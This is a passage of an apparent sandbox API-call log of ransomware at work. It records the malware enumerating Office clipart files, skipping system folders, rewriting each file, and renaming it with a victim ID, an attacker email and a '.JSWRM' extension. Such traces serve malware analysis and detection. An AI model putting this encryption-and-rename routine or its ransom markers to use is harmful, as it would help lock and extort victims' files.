cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.355] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0095.356] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0095.356] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0095.356] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0095.356] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0095.356] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SHOW_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\show_01.mid"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SHOW_01.MID.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\show_01.mid.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.356] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0095.356] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0095.356] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0095.356] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102c771c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102c771c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102ed99a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2a0a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SL00256_.WMF", cAlternateFileName="")) returned 1 [0095.356] lstrcmpiW (lpString1="SL00256_.WMF", lpString2=".") returned 1 [0095.357] lstrcmpiW (lpString1="SL00256_.WMF", lpString2="..") returned 1 [0095.357] lstrcmpiW (lpString1="SL00256_.WMF", lpString2="...") returned 1 [0095.357] lstrcmpiW (lpString1="SL00256_.WMF", lpString2="windows") returned -1 [0095.357] lstrcmpiW (lpString1="SL00256_.WMF", lpString2="recovery") returned 1 [0095.357] lstrcmpiW (lpString1="SL00256_.WMF", lpString2="perflogs") returned 1 [0095.357] lstrcmpiW (lpString1="SL00256_.WMF", lpString2="documents and settings") returned 1 [0095.357] lstrcmpiW (lpString1="SL00256_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.357] lstrcmpiW (lpString1="SL00256_.WMF", lpString2="system volume information") returned -1 [0095.357] lstrcmpiW (lpString1="SL00256_.WMF", lpString2="msocache") returned 1 [0095.357] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0095.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL00256_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL00256_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SL00256_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.357] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0095.357] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0095.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL00256_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL00256_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SL00256_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.357] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0095.357] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0095.357] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0095.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.357] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0095.357] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00256_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00256_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.358] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10762) returned 1 [0095.358] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.358] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2a00) returned 0x24d210 [0095.358] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2a00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2a00, lpOverlapped=0x0) returned 1 [0095.360] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.360] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2a00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2a00, lpOverlapped=0x0) returned 1 [0095.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0095.360] CloseHandle (hObject=0x314) returned 1 [0095.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0095.360] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0095.360] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0095.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0095.360] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0095.360] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0095.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0095.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0095.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0095.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0095.360] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00256_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00256_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00256_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00256_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.361] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0095.361] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0095.361] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0095.361] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102c771c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102c771c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102ed99a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7ca4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SL00260_.WMF", cAlternateFileName="")) returned 1 [0095.361] lstrcmpiW (lpString1="SL00260_.WMF", lpString2=".") returned 1 [0095.361] lstrcmpiW (lpString1="SL00260_.WMF", lpString2="..") returned 1 [0095.361] lstrcmpiW (lpString1="SL00260_.WMF", lpString2="...") returned 1 [0095.361] lstrcmpiW (lpString1="SL00260_.WMF", lpString2="windows") returned -1 [0095.361] lstrcmpiW (lpString1="SL00260_.WMF", lpString2="recovery") returned 1 [0095.361] lstrcmpiW (lpString1="SL00260_.WMF", lpString2="perflogs") returned 1 [0095.361] lstrcmpiW (lpString1="SL00260_.WMF", lpString2="documents and settings") returned 1 [0095.362] lstrcmpiW (lpString1="SL00260_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.362] lstrcmpiW (lpString1="SL00260_.WMF", lpString2="system volume information") returned -1 [0095.362] lstrcmpiW (lpString1="SL00260_.WMF", lpString2="msocache") returned 1 [0095.362] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0095.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL00260_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL00260_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SL00260_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.362] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0095.362] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0095.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL00260_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL00260_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SL00260_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.362] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0095.362] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0095.362] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0095.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.362] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0095.362] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00260_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00260_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.382] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=31908) returned 1 [0095.382] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7ca0) returned 0x24d210 [0095.382] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7ca0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7ca0, lpOverlapped=0x0) returned 1 [0095.386] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.386] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7ca0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7ca0, lpOverlapped=0x0) returned 1 [0095.386] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0095.387] CloseHandle (hObject=0x314) returned 1 [0095.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0095.387] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0095.387] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0095.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0095.387] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0095.387] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0095.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0095.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0095.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0095.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0095.387] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00260_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00260_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00260_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00260_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0095.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0095.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0095.388] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102c771c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102c771c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102c771c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf5c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SL00268_.WMF", cAlternateFileName="")) returned 1 [0095.388] lstrcmpiW (lpString1="SL00268_.WMF", lpString2=".") returned 1 [0095.389] lstrcmpiW (lpString1="SL00268_.WMF", lpString2="..") returned 1 [0095.389] lstrcmpiW (lpString1="SL00268_.WMF", lpString2="...") returned 1 [0095.389] lstrcmpiW (lpString1="SL00268_.WMF", lpString2="windows") returned -1 [0095.389] lstrcmpiW (lpString1="SL00268_.WMF", lpString2="recovery") returned 1 [0095.389] lstrcmpiW (lpString1="SL00268_.WMF", lpString2="perflogs") returned 1 [0095.389] lstrcmpiW (lpString1="SL00268_.WMF", lpString2="documents and settings") returned 1 [0095.389] lstrcmpiW (lpString1="SL00268_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.389] lstrcmpiW (lpString1="SL00268_.WMF", lpString2="system volume information") returned -1 [0095.389] lstrcmpiW (lpString1="SL00268_.WMF", lpString2="msocache") returned 1 [0095.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0095.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL00268_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL00268_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SL00268_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0095.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0095.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL00268_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL00268_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SL00268_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0095.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0095.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0095.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0095.389] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00268_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00268_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.390] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3932) returned 1 [0095.390] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf50) returned 0x23fc98 [0095.390] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xf50, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xf50, lpOverlapped=0x0) returned 1 [0095.391] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.391] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xf50, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xf50, lpOverlapped=0x0) returned 1 [0095.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0095.392] CloseHandle (hObject=0x314) returned 1 [0095.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0095.392] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0095.392] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0095.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0095.392] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0095.392] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0095.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0095.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0095.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0095.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0095.392] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00268_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00268_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00268_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00268_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0095.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0095.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0095.393] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102ed99a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102ed99a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102ed99a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1dac, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SL00286_.WMF", cAlternateFileName="")) returned 1 [0095.393] lstrcmpiW (lpString1="SL00286_.WMF", lpString2=".") returned 1 [0095.393] 